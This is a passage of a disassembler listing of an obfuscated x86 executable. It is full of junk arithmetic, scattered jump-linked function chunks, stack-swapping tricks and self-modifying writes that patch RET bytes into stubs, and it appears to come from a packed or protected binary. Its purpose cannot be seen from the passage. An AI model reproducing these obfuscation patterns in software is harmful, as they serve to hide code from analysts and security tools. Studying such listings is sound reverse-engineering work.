; FUNCTION CHUNK AT 00448109 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00449889 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044BCD1 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044E8D2 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004518C4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004570F7 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00458962 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	0D0F9455h
		pop	eax
		sub	eax, 2B228F0Bh
		jmp	loc_440032
sub_456C15	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		sbb	esi, 81639740h
		jmp	sub_451EEA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45482D

loc_456C35:				; CODE XREF: sub_45482D:loc_43CA65j
		pushf
		mov	ebp, 0B35D8AEDh
		jmp	loc_44D4C2
; END OF FUNCTION CHUNK	FOR sub_45482D
; ---------------------------------------------------------------------------
		pushf
		sbb	esi, 902DC7A8h
		jmp	sub_43C745
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4478AB

loc_456C4C:				; CODE XREF: sub_4478AB+B050j
		mov	byte ptr [eax],	0C3h
		jmp	loc_44BD96
; END OF FUNCTION CHUNK	FOR sub_4478AB

; =============== S U B	R O U T	I N E =======================================



sub_456C54	proc near		; CODE XREF: sub_405004+27p
					; sub_456C54+5j
					; DATA XREF: ...
		call	sub_456C5F
		jmp	ds:off_41E184
sub_456C54	endp


; =============== S U B	R O U T	I N E =======================================



sub_456C5F	proc near		; CODE XREF: sub_45458E:loc_447F42j
					; sub_456C54p ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00440DBD SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00442697 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044346B SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00443D74 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044D8C8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004545A0 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004550F2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004567D8 SIZE 0000000E BYTES

		xchg	edi, [esp+0]
		push	edi
		pop	edx
		jmp	loc_440DBD
sub_456C5F	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_66. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4454EF

loc_456C6A:				; CODE XREF: sub_4454EF+19j
		jmp	loc_43E05D
; END OF FUNCTION CHUNK	FOR sub_4454EF
; ---------------------------------------------------------------------------

loc_456C6F:				; CODE XREF: k2vbe3.d:00444274j
		jmp	loc_447D09
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D11

loc_456C74:				; CODE XREF: sub_457D11:loc_45A288j
		or	edx, 0E8D78511h
		and	edx, 218DD846h
		add	edx, 0DFBFA2D0h
		xchg	edx, [esp+0]
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_457D11
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BB73

loc_456C8E:				; CODE XREF: sub_44BB73:loc_4573E0j
		mov	byte ptr [eax],	0C3h
		jmp	loc_458605
; END OF FUNCTION CHUNK	FOR sub_44BB73
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E88E

loc_456C96:				; CODE XREF: sub_43E88Ej
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	eax
		mov	eax, edx
		jmp	loc_45A111
; END OF FUNCTION CHUNK	FOR sub_43E88E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A980

loc_456CA2:				; CODE XREF: sub_45A980+4j
		mov	ecx, 0CDF031F6h
		call	sub_459347
; END OF FUNCTION CHUNK	FOR sub_45A980
; START	OF FUNCTION CHUNK FOR sub_44863D

loc_456CAC:				; CODE XREF: sub_44863D+1228Bj
		xchg	ecx, [edi]
		jmp	loc_453DA7
; END OF FUNCTION CHUNK	FOR sub_44863D
; ---------------------------------------------------------------------------

loc_456CB3:				; DATA XREF: sub_44529A+1150o
		or	eax, eax
		jnz	loc_448109
		jmp	loc_44F2B5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597AE

loc_456CC0:				; CODE XREF: sub_4597AE:loc_44B4B9j
					; k2vbe3.d:0044B4D0j
		xor	eax, 4956B983h
		cmp	eax, 94F8841Ch

loc_456CCC:				; CODE XREF: sub_44DB59+24CDj
		jmp	loc_45809D
; END OF FUNCTION CHUNK	FOR sub_4597AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45080C

loc_456CD1:				; CODE XREF: sub_45080C:loc_4560DFj
		xchg	edi, [esp-4+arg_0]
		jmp	sub_43E282
; END OF FUNCTION CHUNK	FOR sub_45080C
; ---------------------------------------------------------------------------

loc_456CD9:				; CODE XREF: k2vbe3.d:0043CF4Dj
		jo	loc_43C163

; =============== S U B	R O U T	I N E =======================================



sub_456CDF	proc near		; CODE XREF: sub_4408BD+9670p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043CC9D SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0044FD60 SIZE 0000000D BYTES

		xchg	ebx, [esp+4+var_4]
		pop	ebx
		add	eax, 0B545E8BFh
		jmp	loc_44FD60
sub_456CDF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_456CEE:				; CODE XREF: k2vbe3.d:0044957Fj
		or	ebx, 88F6A3AAh
		cmp	ebx, 7AB1AFA6h
		jmp	loc_4490D2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_93. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_456D00:				; CODE XREF: k2vbe3.d:loc_456D26j
					; sub_447E07+10157j
		jmp	loc_43D5F3
; END OF FUNCTION CHUNK	FOR sub_447E07

; =============== S U B	R O U T	I N E =======================================



sub_456D05	proc near		; CODE XREF: sub_457960-A333p
					; k2vbe3.d:0045701Fj
		xchg	esi, [esp+0]
		pop	esi
		pop	ebp
		retn
sub_456D05	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_456D0B:				; CODE XREF: k2vbe3.d:00440B9Ej
					; k2vbe3.d:00459E67j
		jmp	loc_44B1DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BB73

loc_456D10:				; CODE XREF: sub_44BB73+4AD5j
		mov	esi, edi
		xchg	edi, esi
		jmp	loc_443406
; END OF FUNCTION CHUNK	FOR sub_44BB73
; ---------------------------------------------------------------------------
		add	eax, ecx
		jmp	loc_455F42
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_487. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4590BA

loc_456D21:				; CODE XREF: sub_4590BA-ED7Aj
		jmp	loc_45A292
; END OF FUNCTION CHUNK	FOR sub_4590BA
; ---------------------------------------------------------------------------

loc_456D26:				; CODE XREF: k2vbe3.d:00444A55j
		js	loc_456D00
		xor	esi, 0E7E9448Fh

; =============== S U B	R O U T	I N E =======================================



sub_456D32	proc near		; CODE XREF: sub_43E69A+3p

; FUNCTION CHUNK AT 0044AF38 SIZE 00000001 BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	eax, [ebp-4]
		xor	edx, edx

loc_456D3B:				; CODE XREF: sub_45830D-11882j
		push	edx
		jmp	loc_44AF38
sub_456D32	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	offset sub_454903
		jmp	locret_44A1E1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_278. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_456D4C:				; CODE XREF: k2vbe3.d:004538DEj
		jmp	loc_449E87
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E388

loc_456D51:				; CODE XREF: sub_44E388-9E30j
		jmp	nullsub_256
; END OF FUNCTION CHUNK	FOR sub_44E388
; ---------------------------------------------------------------------------

loc_456D56:				; CODE XREF: k2vbe3.d:loc_443371j
		jnz	loc_45B1B8
		jmp	loc_45694E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442C22

loc_456D61:				; CODE XREF: sub_442C22:loc_43C4D7j
		jz	loc_448A99
		jmp	loc_449C87
; END OF FUNCTION CHUNK	FOR sub_442C22
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------

loc_456D6D:				; CODE XREF: k2vbe3.d:004584A7j
		jmp	loc_452E66
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460FD

loc_456D72:				; CODE XREF: sub_4460FD+E0AAj
		jmp	nullsub_309
; END OF FUNCTION CHUNK	FOR sub_4460FD
; ---------------------------------------------------------------------------

loc_456D77:				; CODE XREF: k2vbe3.d:loc_440BE7j
		call	sub_4436CE
		mov	edx, 19EDC823h
		call	sub_45B20A
		call	sub_4436CE
		call	sub_43E4CE
		xor	edi, 0C57913A6h
		jmp	loc_444715
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_456D9B:				; CODE XREF: sub_43CCD0+224Ej
		ror	eax, 16h
		or	ebp, edi
		jmp	loc_44D25A
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444EFA

loc_456DA5:				; CODE XREF: sub_444EFA+229Cj
		jp	loc_448E6B
		ror	edx, 3
		jmp	loc_43E76D
; END OF FUNCTION CHUNK	FOR sub_444EFA

; =============== S U B	R O U T	I N E =======================================



sub_456DB3	proc near		; CODE XREF: k2vbe3.d:0044670Dp
					; k2vbe3.d:0044C4F9j
		xchg	edx, [esp+0]
		pop	edx
		call	sub_4553CC
		mov	ds:dword_41E058, eax
		lea	eax, nullsub_257
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_257
sub_456DB3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	edi
		push	30AC449Bh

loc_456DD6:				; CODE XREF: k2vbe3.d:00456566j
		jmp	loc_44DCA2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443EF6

loc_456DDB:				; CODE XREF: sub_443EF6:loc_43E9DFj
		rol	ebx, 0Ch
		test	ebx, 10h
		jmp	loc_459F9C
; END OF FUNCTION CHUNK	FOR sub_443EF6

; =============== S U B	R O U T	I N E =======================================



sub_456DE9	proc near		; DATA XREF: sub_44F614+C568o
		push	ecx
		push	89999EDCh
		pop	ecx
		and	ecx, 0DADEF50h
sub_456DE9	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_441885

loc_456DF6:				; CODE XREF: sub_441885:loc_43D577j
		or	ecx, 4786D11Ch
		jmp	loc_44A758
; END OF FUNCTION CHUNK	FOR sub_441885
; ---------------------------------------------------------------------------

loc_456E01:				; DATA XREF: sub_4551AC-18B28o
		xor	eax, 0C8379657h
		add	eax, ebp
		add	eax, 0D7F1F8A5h
		xor	edx, edx
		jmp	loc_443684
; ---------------------------------------------------------------------------

loc_456E16:				; CODE XREF: k2vbe3.d:00455BBCj
					; k2vbe3.d:loc_45BECEj
		sbb	edx, eax
		jmp	loc_44FD6D
; ---------------------------------------------------------------------------

loc_456E1D:				; CODE XREF: k2vbe3.d:00446E54j
		jnz	loc_457DE2
		cdq
		cmp	ecx, 7107FFC0h
		jmp	loc_457DDC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A1B1

loc_456E2F:				; CODE XREF: sub_44A1B1+EC5Dj
		push	offset sub_453AE8
		jmp	nullsub_297
; END OF FUNCTION CHUNK	FOR sub_44A1B1
; ---------------------------------------------------------------------------
		push	edi
		jmp	sub_451CF1
; ---------------------------------------------------------------------------

loc_456E3F:				; DATA XREF: sub_456666+507o
		add	ecx, 0F63DF12Ch
		mov	ecx, [ecx]
		or	[ecx+edx], al
		mov	ecx, [ebp-20h]
		and	ecx, 7
		mov	al, 1
		shl	al, cl
		jmp	loc_455A88
; ---------------------------------------------------------------------------

loc_456E59:				; CODE XREF: k2vbe3.d:0044AEA1j
		sbb	esi, edi
; START	OF FUNCTION CHUNK FOR sub_447664

loc_456E5B:				; CODE XREF: sub_447664:loc_44AE8Bj
		push	offset loc_44BFC1
		jmp	nullsub_277
; END OF FUNCTION CHUNK	FOR sub_447664
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A634

loc_456E65:				; CODE XREF: sub_45A634+17j
		add	esi, 641C76F0h

loc_456E6B:				; CODE XREF: k2vbe3.d:loc_4488FDj
		and	esi, 133BFDD1h
		xor	esi, 21B6CC0h
		xchg	esi, [esp+0]
		jmp	loc_442BD0
; END OF FUNCTION CHUNK	FOR sub_45A634
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44032C

loc_456E7F:				; CODE XREF: sub_44032C:loc_4491EBj
		pop	edx
		rol	edx, 5
		add	edx, 20033EE9h
		xchg	edx, [esp+0]
		jmp	loc_44D7E3
; END OF FUNCTION CHUNK	FOR sub_44032C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4474F9

loc_456E91:				; CODE XREF: sub_4474F9+Fj
		sub	ebx, 165ED16Bh
		xor	ebx, 2DAEF820h
		or	ebx, 0F7D40DE3h
		rol	ebx, 9
		add	ebx, 15C4CA35h
		xchg	ebx, [esp+4+var_4]
		jmp	nullsub_480
; END OF FUNCTION CHUNK	FOR sub_4474F9
; ---------------------------------------------------------------------------
		push	ebx
		push	0C2D17B9Ch
		pop	ebx
		or	ebx, 32B75D7Ah
		js	loc_43F3BB
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_456EC7:				; CODE XREF: sub_450F71+2E10j
		jmp	loc_4578B8
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
		mov	ebp, [edi]
		and	ecx, ebx
		jmp	loc_43F3B5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446478

loc_456ED5:				; CODE XREF: sub_446478+9F59j
		add	eax, 47D71BBh
		and	eax, 0E2CF843Ch
		add	eax, 0FFF563E6h
		xchg	eax, [esp+0]
		jmp	loc_44D1B8
; END OF FUNCTION CHUNK	FOR sub_446478
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_456EEF:				; CODE XREF: sub_4467A1:loc_452576j
		cmp	dword ptr [ebp-4], 0
		jnz	loc_44C27C
		jmp	loc_441FB9
; END OF FUNCTION CHUNK	FOR sub_4467A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_456EFE:				; CODE XREF: sub_44B94B:loc_449AC5j
		rol	ebp, 11h

loc_456F01:				; CODE XREF: sub_43E3FD:loc_449AB6j
		add	edi, 0DAABF4B0h
		push	offset sub_457A01
		jmp	nullsub_229
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------

loc_456F11:				; CODE XREF: k2vbe3.d:loc_45479Aj
		mov	edx, ecx
		pop	ecx
		pop	eax
		mov	ds:dword_43D4E0, edx
		jmp	loc_440615
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_307. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A9B3

loc_456F21:				; CODE XREF: sub_45A9B3-A015j
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_45A9B3
; ---------------------------------------------------------------------------

loc_456F26:				; CODE XREF: k2vbe3.d:004420E4j
		jmp	loc_459A04
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D298

loc_456F2B:				; CODE XREF: sub_44D298+8368j
		jl	loc_4528C1

loc_456F31:				; CODE XREF: k2vbe3.d:00454E9Fj
		jmp	loc_44FB03
; END OF FUNCTION CHUNK	FOR sub_44D298
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F028

loc_456F36:				; CODE XREF: sub_44F028+A71j
		jmp	loc_45A0DD
; END OF FUNCTION CHUNK	FOR sub_44F028
; ---------------------------------------------------------------------------
		js	loc_43C486
		xor	edx, eax
		jmp	loc_4528BD
; ---------------------------------------------------------------------------

loc_456F48:				; CODE XREF: k2vbe3.d:loc_45479Fj
		push	offset loc_44F786
		jmp	locret_44DBDC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440E5

loc_456F52:				; CODE XREF: sub_4440E5:loc_45B467j
		push	24CE031Fh
		pop	eax
		sub	eax, 0DDFA659Ah
		xor	eax, 195AC9h
		or	eax, 901B1EA1h
		jnz	loc_4443AC

loc_456F70:				; CODE XREF: sub_447C43+EBEAj
		jmp	loc_455985
; END OF FUNCTION CHUNK	FOR sub_4440E5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518D8

loc_456F75:				; CODE XREF: sub_4518D8:loc_448A64j
		push	ecx
		push	51F21ABDh
		pop	ecx
		or	ecx, 4A71C58h
		and	ecx, 2A4D5DA1h
		add	ecx, 0C6CB80AFh
		xor	ecx, 7CDD71DDh
		jmp	loc_459E91
; END OF FUNCTION CHUNK	FOR sub_4518D8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B999

loc_456F99:				; CODE XREF: sub_44B999:loc_44F8E1j
		mov	eax, 1298EDBEh
		sbb	esi, 12ADCD4Ah
		jmp	loc_44E7CF
; END OF FUNCTION CHUNK	FOR sub_44B999
; ---------------------------------------------------------------------------

loc_456FA9:				; CODE XREF: k2vbe3.d:00452E0Ej
		jz	loc_43D16F
		jmp	loc_441530
; ---------------------------------------------------------------------------

loc_456FB4:				; DATA XREF: k2vbe3.d:0045BACDo
		xchg	ebx, [esp]
		mov	ecx, ebx
		pop	ebx
		jb	loc_45372F
		mov	eax, [esp]
		push	ecx
		mov	ecx, edx
		jmp	loc_4515A4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_456FCB:				; CODE XREF: k2vbe3.d:0044E158j
					; sub_45A323+26Bj
		add	edx, 65977BC0h
		sub	edx, 6E974096h
		add	edx, 0F4271591h
		call	sub_43D8BF
; END OF FUNCTION CHUNK	FOR sub_45A323

; =============== S U B	R O U T	I N E =======================================



sub_456FE2	proc near		; CODE XREF: sub_4198C0+B1p
					; sub_456FE2+5j
					; DATA XREF: ...
		call	sub_456FED
		jmp	ds:off_41E1F4
sub_456FE2	endp


; =============== S U B	R O U T	I N E =======================================



sub_456FED	proc near		; CODE XREF: k2vbe3.d:loc_44ADADj
					; sub_456FED:loc_450E1Cj ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004428C0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D291 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D3C8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E133 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00450E1C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004561AD SIZE 00000016 BYTES

		js	loc_4561B5
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	ecx
		mov	ecx, edx
		jmp	loc_44D3C8
sub_456FED	endp

; ---------------------------------------------------------------------------

loc_456FFF:				; CODE XREF: k2vbe3.d:00446A74j
		mov	[ebx], ecx

loc_457001:				; CODE XREF: k2vbe3.d:loc_446A6Bj
		sub	edx, 3056AD22h
		jnb	loc_44FCC5
; START	OF FUNCTION CHUNK FOR sub_453AE8

loc_45700D:				; CODE XREF: sub_453AE8-5527j
		jmp	loc_44BF75
; END OF FUNCTION CHUNK	FOR sub_453AE8
; ---------------------------------------------------------------------------
		or	esi, ebp
		jmp	loc_44FCC2
; ---------------------------------------------------------------------------
		jg	loc_453BB0
		jmp	sub_456D05

; =============== S U B	R O U T	I N E =======================================



sub_457024	proc near		; CODE XREF: k2vbe3.d:00441312j
					; sub_457D4B:loc_448B0Cp
		xchg	ebx, [esp+0]

loc_457027:				; CODE XREF: sub_444144:loc_448FBDj
		pop	ebx
		push	edx
		push	4BA63D70h
		jmp	loc_451356
sub_457024	endp

; ---------------------------------------------------------------------------
		jmp	ds:off_41E020
; ---------------------------------------------------------------------------

loc_457039:				; CODE XREF: k2vbe3.d:0044A5DBj
		jmp	loc_45AE13
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440B5

loc_45703E:				; CODE XREF: sub_4440B5+239Ej
		jmp	loc_450A5E
; END OF FUNCTION CHUNK	FOR sub_4440B5
; ---------------------------------------------------------------------------

loc_457043:				; CODE XREF: k2vbe3.d:0043DC4Fj
		jmp	sub_458951
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458BA9

loc_457048:				; CODE XREF: sub_45775D-12E28j
					; k2vbe3.d:loc_457C60j	...
		jo	loc_458BB5
		call	sub_458D4F
; END OF FUNCTION CHUNK	FOR sub_458BA9
; START	OF FUNCTION CHUNK FOR sub_458F54

loc_457053:				; CODE XREF: sub_458F54-A355j
		jmp	loc_44D490
; END OF FUNCTION CHUNK	FOR sub_458F54
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E542

loc_457058:				; CODE XREF: sub_44E542-6AF5j
		jmp	loc_45466F
; END OF FUNCTION CHUNK	FOR sub_44E542
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455F6B

loc_45705D:				; CODE XREF: sub_455F6B:loc_441FD7j
		pop	edi
		or	edi, 0DE969747h
		add	edi, 3AD4D095h
		add	edi, ebp
		jmp	loc_4402C1
; END OF FUNCTION CHUNK	FOR sub_455F6B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44498A

loc_457071:				; CODE XREF: sub_44498A:loc_43E273j
		jge	loc_44BE67
		or	esi, 6F8F8C85h
		ror	ebx, 7
		sbb	ebx, eax
		jp	loc_4467DC
		xor	ebx, 8940CC43h
		jmp	loc_44BE67
; END OF FUNCTION CHUNK	FOR sub_44498A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA1E

loc_457093:				; CODE XREF: sub_43DA1E:loc_454A44j
		jz	loc_44CB7B

loc_457099:				; CODE XREF: k2vbe3.d:00444580j
		jmp	nullsub_116
; END OF FUNCTION CHUNK	FOR sub_43DA1E
; ---------------------------------------------------------------------------
		mov	edx, esi
		shl	ebp, 10h

; =============== S U B	R O U T	I N E =======================================



sub_4570A3	proc near		; CODE XREF: sub_45B20A:loc_44974Dj

; FUNCTION CHUNK AT 00447511 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044CB75 SIZE 00000006 BYTES

		push	ebp
		or	ebp, 85B16AFBh
		cmp	ecx, 502927ACh
		jmp	loc_44CB75
sub_4570A3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44866A

loc_4570B5:				; CODE XREF: sub_44866A:loc_454941j
		jnz	loc_448C4B
		jmp	loc_444240
; END OF FUNCTION CHUNK	FOR sub_44866A

; =============== S U B	R O U T	I N E =======================================



sub_4570C0	proc near		; CODE XREF: sub_43E360+Fp
					; sub_43E360:loc_441D39p ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043D52D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043EF88 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043EF9D SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043FB18 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00442291 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004424B5 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004424FB SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044914E SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044BA70 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044C4D7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E473 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044ED37 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F243 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00451BB4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454045 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004542FB SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00455737 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045BF7B SIZE 00000005 BYTES

		jz	loc_44F243
		push	ebp
		mov	ebp, esp

loc_4570C9:				; CODE XREF: sub_44660F+37Cj
		push	ecx
		mov	esp, ebp
		pop	ebp
		jmp	loc_455737
sub_4570C0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_4570D2:				; CODE XREF: sub_43F7AC+1590Aj
		jnz	loc_44C4B4

loc_4570D8:				; CODE XREF: k2vbe3.d:0045737Bj
					; k2vbe3.d:0045A59Ej
		jmp	loc_458B4B
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CA34

loc_4570DD:				; CODE XREF: sub_44CA34+15j
		jmp	loc_451622
; END OF FUNCTION CHUNK	FOR sub_44CA34
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_4570E2:				; CODE XREF: sub_450F71-D6AFj
		jmp	loc_447A93
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
		not	esi
		adc	eax, 2FA983C5h
		rol	eax, 8
		jmp	loc_44C4AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456C15

loc_4570F7:				; CODE XREF: sub_456C15:loc_4445CEj
		jz	loc_43D6A7
		jnp	loc_4447C7
		jl	nullsub_234
		jmp	loc_43D6A7
; END OF FUNCTION CHUNK	FOR sub_456C15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A309

loc_45710E:				; CODE XREF: sub_45A309+6j
		push	offset loc_4599EF
		jmp	nullsub_369
; END OF FUNCTION CHUNK	FOR sub_45A309
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_457118:				; CODE XREF: sub_456666:loc_451DD1j
					; k2vbe3.d:004594CAj
		sbb	edi, ebp

loc_45711A:				; CODE XREF: sub_44469A:loc_4594B9j
		or	ecx, ds:4000ECh
		add	ecx, 0E1441A7Dh
		mov	ecx, [ecx]
		or	[ecx+edx], al
		push	8622E5DBh
		pop	ecx
		sub	ecx, 0E6ADCA64h
		jmp	loc_43D8BA
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BEA

loc_45713C:				; CODE XREF: sub_444BEA:loc_43C012j
		add	edx, 0DEC1EF6Eh
		xor	edx, 71AAF6B3h
		push	offset loc_4406C7
		jmp	loc_45503F
; END OF FUNCTION CHUNK	FOR sub_444BEA
; ---------------------------------------------------------------------------
		pop	edi
		sbb	esi, ecx
		jmp	sub_4500BB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457580

loc_45715A:				; CODE XREF: sub_457580+426Fj
		shr	edx, 2
		jmp	loc_448F68
; END OF FUNCTION CHUNK	FOR sub_457580
; ---------------------------------------------------------------------------
		sbb	edx, 5A00F3C2h
		jmp	sub_4467E1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DAF6

loc_45716D:				; CODE XREF: sub_44DAF6:loc_44C4E9j
		add	esi, 47FB9F6Dh
		mov	[esi], eax
		pop	esi
		mov	eax, [ebp-4]
		jmp	loc_44DFD1
; END OF FUNCTION CHUNK	FOR sub_44DAF6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_210. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_45717F:				; CODE XREF: k2vbe3.d:0045AAACj
		jmp	sub_4553CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D823

loc_457184:				; CODE XREF: sub_43D823+E97Cj
		jmp	loc_455B95
; END OF FUNCTION CHUNK	FOR sub_43D823
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459DA3

loc_457189:				; CODE XREF: sub_459DA3-1BB76j
		mov	eax, ds:dword_43FAA4
		or	eax, eax
		jnz	loc_457AE6
		jmp	loc_441616
; END OF FUNCTION CHUNK	FOR sub_459DA3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449312

loc_45719C:				; CODE XREF: sub_449312-A0CEj
		jbe	loc_45873F
		sub	esi, 0EAA26753h
		jmp	loc_447805
; END OF FUNCTION CHUNK	FOR sub_449312
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451222

loc_4571AD:				; CODE XREF: sub_451222+9D98j
		push	0BB66B533h
		pop	edx
		and	edx, 0ADD1417Bh
		add	edx, 0A6E17420h
		xor	eax, edx
		pop	edx
		push	edi
		jmp	loc_441DAF
; END OF FUNCTION CHUNK	FOR sub_451222

; =============== S U B	R O U T	I N E =======================================



sub_4571C8	proc near		; DATA XREF: sub_4487ED+5o
		mov	ds:dword_41E18C, eax
		lea	eax, nullsub_18
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_18
sub_4571C8	endp

; ---------------------------------------------------------------------------
